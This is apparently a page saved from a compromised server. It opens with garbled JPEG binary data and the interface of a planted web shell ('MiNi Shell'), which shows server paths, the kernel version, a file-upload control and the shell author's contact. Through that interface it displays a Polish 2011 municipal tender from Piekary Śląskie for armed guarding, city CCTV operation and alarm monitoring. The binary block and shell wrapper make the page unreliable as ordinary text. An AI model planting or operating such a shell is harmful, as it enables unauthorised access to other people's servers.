JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20111215/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20111215/332333-N-2011.html

<p class="kh_header"><b>Piekary Śląskie: Zabezpieczenie i ochrona fizyczna osób oraz mienia, obiektów Urzędu Miasta Piekary Śląskie przy ul. Bytomskiej 84 i 92 i terenu wokół nich .
Obsługa systemu telewizji dozorowej na terenie miasta Piekary Śląskie - monitoringu wizyjnego miast .
Patrolowanie terenu miasta Piekary Śląskie przez grupy interwencyjne .
2. Monitoring przy użyciu systemu alarmowego i działania grup interwencyjnych nieruchomości gruntowych zabudowanych położonych w Piekarach Śląskich .</b><br>
<b>Numer ogłoszenia: 332333 - 2011; data zamieszczenia: 15.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prezydent Miasta  Piekary Śląskie , ul. Bytomska 84, 41-940 Piekary Śląskie, woj. śląskie, tel. 032 3939337, faks (032) 287 22 69.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.piekary.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.piekary.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zabezpieczenie i ochrona fizyczna osób oraz mienia, obiektów Urzędu Miasta Piekary Śląskie przy ul. Bytomskiej 84 i 92 i terenu wokół nich .
Obsługa systemu telewizji dozorowej na terenie miasta Piekary Śląskie - monitoringu wizyjnego miast .
Patrolowanie terenu miasta Piekary Śląskie przez grupy interwencyjne .
2. Monitoring przy użyciu systemu alarmowego i działania grup interwencyjnych nieruchomości gruntowych zabudowanych położonych w Piekarach Śląskich ..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Zabezpieczenia i ochrona fizyczne osób oraz mienia obiektów Urzędu Miasta Piekary Śląskie przy ul. Bytomskiej 84 (Urząd Miasta i Urząd Stanu Cywilnego) oraz przy ul. Bytomskiej 92 wraz z terenami wokół nich ,Zabezpieczenie i fizyczna ochrona obiektów Urzędu Miasta będzie realizowana w systemie 24 godzinnym w dni wolne od pracy (w soboty, niedziele i święta), natomiast w dni robocze w godzinach: 
a) poniedziałki od 16.45 do 7.30 b) wtorki, środy czwartki od 15.15 do7.30;							                 
c) piątki od 13.45 do 7.30.
2. Obsługa systemu telewizji dozorowej na terenie Miasta Piekary Śląskie - monitoringu wizyjnego Miasta
Obsługa systemu monitoringu wizyjnego Miasta odbywać się będzie codziennie w systemie 24 godzinnym.
3. Patrolowania terenu Miasta Piekary Śląskie przez grupy interwencyjne.
Patrolowanie terenu odbywać się będzie codziennie w szczególności w godzinach 17.00 - 6.00, przez grupy interwencyjne liczące min. 2 pracowników wyposażonych w broń palną bojową oraz środki przymusu bezpośredniego (minimum 6 objazdów prewencyjnych w godzinach 17.00-6.00).
Szczegółowy zakres zadań i obowiązków związanych z realizacją zamówienia określony jest w Załączniku nr 1 do umowy - Regulamin służby ochronnej i obsługi monitoringu miejskiego.
Zamawiający wymaga , aby Oferent  dysponował :
1.Co najmniej 2 grupami  interwencyjnymi działającymi w obrębie miasta Piekary Śląskie - minimum 2 osobowe, wyposażone w broń palną bojową oraz środki przymusu bezpośredniego.
a)Wymagany czas dojazdu grupy - nie dłuższy niż 7 min.
b) W związku z tym do oferty należy dołączyć telefon , nazwisko i ewentualne hasło do osoby koordynującej prace grupy interwencyjnej .

2.Monitoring przy użyciu systemu alarmowego i działania grup interwencyjnych nieruchomości gruntowych zabudowanych położonych w Piekarach Śląskich . 

1. Przedmiotem zamówienia jest monitoring przy użyciu systemu alarmowego i działania grupy interwencyjnej nieruchomości gruntowych zabudowanych, położonych w Piekarach Śląskich przy ul. Gen. Maczka 18 i ul. Ks. J. Popiełuszki 17 i 9.
2.  Zakres zamówienia
a) Nadzór przy użyciu alarmu obiektów - całodobowy nadzór poprzez podłączony system do centrum monitorowania Wykonawcy oraz każdorazowe stawienie się na nieruchomości grupy interwencyjnej w chwili włączenia się systemu alarmowego w czasie 15 minut od chwili włączenia się alarmu;
b) Serwis konserwacyjny systemu alarmowego (jednorazowy przegląd systemu alarmowego zamontowanego na obiektach, który wykonawca wykona w miesiącu czerwcu 2012r.)
c) Zabezpieczenie obiektów własną ochroną fizyczną na zasadach wynikających z postanowień umowy. 
Charakterystyka obiektów podlegających monitoringowi
1. Budynek po byłej Przychodni Rejonowej Nr 3 (pustostan), zlokalizowany w Piekarach Śląskich przy ulicy Gen. Maczka 18, o kubaturze 3.418,20 m3 i powierzchni użytkowej 640,39 m2. Budynek jest obiektem jednopiętrowym, o prostej bryle, w części podpiwniczonym, o dachu płaskim - czterospadowym. Konstrukcję budynku stanowią ściany nośne zewnętrzne grubości 2 cegieł oraz podłużna ściana wewnętrzna grubości 1,5 cegły, dzieląca budynek na dwa trakty.
Budynek wzniesiono w latach siedemdziesiątych XX wieku. Obiekt jest częściowo podpiwniczony. W części podpiwniczonej znajduje się kotłowania z wymiennikownią.
Budynek jest wyposażony w instalację wodno-kanalizacyjną, elektryczną i centralnego ogrzewania (własna kotłowania). Wejście do budynku odbywa się poprzez taras, na który prowadzą trzy rzędy schodów i pochylnia dla wózków.
2. Budynek główny po byłym Dziennym Ośrodku Rehabilitacji Leczniczej (pustostan), zlokalizowany w Piekarach Śląskich przy ulicy Ks. Popiełuszki 17, o kubaturze 1663,95 m3 i powierzchni użytkowej 330,76 m2. Budynek wolnostojący, częściowo podpiwniczony, zbudowany w latach 30 tych XX wieku. Został wykonany w całości w technologii tradycyjnej o podłużnym układzie ścian nośnych. Konstrukcja dachu wykonana ze stalowej więźby dachowej krytej blachą trapezówką na którą położona jest suprema i papa. Stolarka okienna i drzwiowa - nietypowa, okna drewniane podwójne, w piwnicach okna pojedyncze, drzwi drewniane typu płycinowego. Budynek wyposażony w instalacje wodno - kanalizacyjną, elektryczną oraz C.O. Ogrzewanie z własnej kotłowni gazowej piecem II funkcyjnym, grzejniki żeliwne bez termostatów.
Oficyna Dziennego Ośrodka Rehabilitacji Leczniczej (pustostan), zlokalizowana w Piekarach Śląskich przy ulicy Ks. Popiełuszki 9, o kubaturze 351m3 i powierzchni użytkowej 157,25m2. Budynek oficyny wolnostojący, niepodpiwniczony. Został wykonany w całości w technologii tradycyjnej o podłużnym układzie ścian nośnych. Konstrukcja dachu drewniana, kryta papą. Okna drewniane, drzwi drewniane, typu płycinowego. Budynek wyposażony w instalacje wodno - kanalizacyjną, elektryczną, odgromową oraz C.O.
Budynek główny wraz oficyną jest ogrodzony z dwóch stron, brama wjazdowa wykonana z belek drewnianych na konstrukcji metalowej. Centrala systemu alarmowego została zamontowana w budynku głównym przy ul. Ks. Popiełuszki 17 ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- dysponują uprawnieniami ( koncesją ) do prowadzenia działalności gospodarczej w zakresie przedmiotu zamówienia tj. usług w zakresie ochrony osób i mienia .</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- wykonanie w ostatnich trzech latach, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, min. 1 usługi w zakresie obsługi monitoringu  miejskiego  trwającego nieprzerwanie co najmniej 12 miesiące w ciągu ostatnich 3 lat ,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-dysponowanie całodobowym centrum monitorowania i pozwoleniem radiowym obowiązującym na terenie miasta Piekary Śląskie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- dysponowanie min. 21 osobami posiadającymi licencję ochrony fizycznej co najmniej I stopnia ,
- dysponowanie min. 2 osobami posiadającymi licencję ochrony fizycznej II stopnia  
  ( w tym dysponowanie min. 11 osobami dodatkowo posiadających poświadczenie bezpieczeństwa osobowego upoważniającego do dostępu do informacji niejawnych do klauzuli Poufne do obsługi monitoringu wizyjnego )</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- posiadanie ubezpieczenia od odpowiedzialności cywilnej za szkody wynikłe z tytułu niewykonania lub nienależytego wykonania przedmiotu umowy w zakresie ochrony fizycznej na sumę nie mniejszą niż 3 000 000,00 zł ( trzy miliony złotych ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>wypełniony formularz oferty - odrębnie dla każdej części</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.piekary.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Piekary Śląskie 
ul. Bytomska 84 
41-940 Piekary Śląskie 
Biuro Zamówień Publicznych , pok. 218.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.12.2011 godzina 08:30, miejsce: Urząd Miasta Piekary Śląskie 
ul. Bytomska 84 
41-940 Piekary Śląskie 
Biuro Zamówień Publicznych , pok. 218.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> 1.Zabezpieczenie i ochrona fizyczna osób oraz mienia , obiektów Urzędu Miasta Piekary Śląskie 
przy ul. Bytomskiej 84 i 92 i terenu wokół nich.
Obsługa systemu telewizji dozorowej na terenie Miasta Piekary Śląskie - monitoringu wizyjnego miast..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Zabezpieczenia i ochrona fizyczne osób oraz mienia obiektów Urzędu Miasta Piekary Śląskie przy ul. Bytomskiej 84 (Urząd Miasta i Urząd Stanu Cywilnego) oraz przy ul. Bytomskiej 92 wraz z terenami wokół nich;
Zabezpieczenie i fizyczna ochrona obiektów Urzędu Miasta będzie realizowana w systemie 24 godzinnym w dni wolne od pracy (w soboty, niedziele i święta), natomiast w dni robocze w godzinach: a) poniedziałki od 16.45 do 7.30;							                               b) wtorki, środy czwartki od 15.15 do 7.30;							                 c) piątki od 13.45 do 7.30.
2. Obsługa systemu telewizji dozorowej na terenie Miasta Piekary Śląskie - monitoringu wizyjnego Miasta
Obsługa systemu monitoringu wizyjnego Miasta odbywać się będzie codziennie w systemie 24 godzinnym.
3. Patrolowania terenu Miasta Piekary Śląskie przez grupy interwencyjne.
Patrolowanie terenu odbywać się będzie codziennie w szczególności w godzinach 17.00 - 6.00, przez grupy interwencyjne liczące min. 2 pracowników wyposażonych w broń palną bojową oraz środki przymusu bezpośredniego (minimum 6 objazdów prewencyjnych w godzinach 17.00-6.00).
Szczegółowy zakres zadań i obowiązków związanych z realizacją zamówienia określony jest w Załączniku nr 1 do umowy - Regulamin służby ochronnej i obsługi monitoringu miejskiego.
Zamawiający wymaga , aby Oferent  dysponował :
1.Co najmniej 2 grupami  interwencyjnymi działającymi w obrębie miasta Piekary Śląskie - minimum 2 osobowe, wyposażone w broń palną bojową oraz środki przymusu bezpośredniego.
a)Wymagany czas dojazdu grupy - nie dłuższy niż 7 min.
b) W związku z tym do oferty należy dołączyć telefon , nazwisko i ewentualne hasło do osoby koordynującej prace grupy interwencyjnej ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Monitoring przy użyciu systemu alarmowego i działania grup interwencyjnych nieruchomości gruntowych zabudowanych położonych w Piekarach Śląskich ..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest monitoring przy użyciu systemu alarmowego i działania grupy interwencyjnej nieruchomości gruntowych zabudowanych, położonych w Piekarach Śląskich przy ul. Gen. Maczka 18 i ul. Ks. J. Popiełuszki 17 i 9.
2.  Zakres zamówienia
a) Nadzór przy użyciu alarmu obiektów - całodobowy nadzór poprzez podłączony system do centrum monitorowania Wykonawcy oraz każdorazowe stawienie się na nieruchomości grupy interwencyjnej w chwili włączenia się systemu alarmowego w czasie 15 minut od chwili włączenia się alarmu;
b) Serwis konserwacyjny systemu alarmowego (jednorazowy przegląd systemu alarmowego zamontowanego na obiektach, który wykonawca wykona w miesiącu czerwcu 2012r.)
c) Zabezpieczenie obiektów własną ochroną fizyczną na zasadach wynikających z postanowień umowy. 
Charakterystyka obiektów podlegających monitoringowi
1. Budynek po byłej Przychodni Rejonowej Nr 3 (pustostan), zlokalizowany w Piekarach Śląskich przy ulicy Gen. Maczka 18, o kubaturze 3.418,20 m3 i powierzchni użytkowej 640,39 m2. Budynek jest obiektem jednopiętrowym, o prostej bryle, w części podpiwniczonym, o dachu płaskim - czterospadowym. Konstrukcję budynku stanowią ściany nośne zewnętrzne grubości 2 cegieł oraz podłużna ściana wewnętrzna grubości 1,5 cegły, dzieląca budynek na dwa trakty.
Budynek wzniesiono w latach siedemdziesiątych XX wieku. Obiekt jest częściowo podpiwniczony. W części podpiwniczonej znajduje się kotłowania z wymiennikownią.
Budynek jest wyposażony w instalację wodno-kanalizacyjną, elektryczną i centralnego ogrzewania (własna kotłowania). Wejście do budynku odbywa się poprzez taras, na który prowadzą trzy rzędy schodów i pochylnia dla wózków.
2. Budynek główny po byłym Dziennym Ośrodku Rehabilitacji Leczniczej (pustostan), zlokalizowany w Piekarach Śląskich przy ulicy Ks. Popiełuszki 17, o kubaturze 1663,95 m3 i powierzchni użytkowej 330,76 m2. Budynek wolnostojący, częściowo podpiwniczony, zbudowany w latach 30 tych XX wieku. Został wykonany w całości w technologii tradycyjnej o podłużnym układzie ścian nośnych. Konstrukcja dachu wykonana ze stalowej więźby dachowej krytej blachą trapezówką na którą położona jest suprema i papa. Stolarka okienna i drzwiowa - nietypowa, okna drewniane podwójne, w piwnicach okna pojedyncze, drzwi drewniane typu płycinowego. Budynek wyposażony w instalacje wodno - kanalizacyjną, elektryczną oraz C.O. Ogrzewanie z własnej kotłowni gazowej piecem II funkcyjnym, grzejniki żeliwne bez termostatów.
Oficyna Dziennego Ośrodka Rehabilitacji Leczniczej (pustostan), zlokalizowana w Piekarach Śląskich przy ulicy Ks. Popiełuszki 9, o kubaturze 351m3 i powierzchni użytkowej 157,25m2. Budynek oficyny wolnostojący, niepodpiwniczony. Został wykonany w całości w technologii tradycyjnej o podłużnym układzie ścian nośnych. Konstrukcja dachu drewniana, kryta papą. Okna drewniane, drzwi drewniane, typu płycinowego. Budynek wyposażony w instalacje wodno - kanalizacyjną, elektryczną, odgromową oraz C.O.
Budynek główny wraz oficyną jest ogrodzony z dwóch stron, brama wjazdowa wykonana z belek drewnianych na konstrukcji metalowej
Centrala systemu alarmowego została zamontowana w budynku głównym przy ul. Ks. Popiełuszki 17 ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.01.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com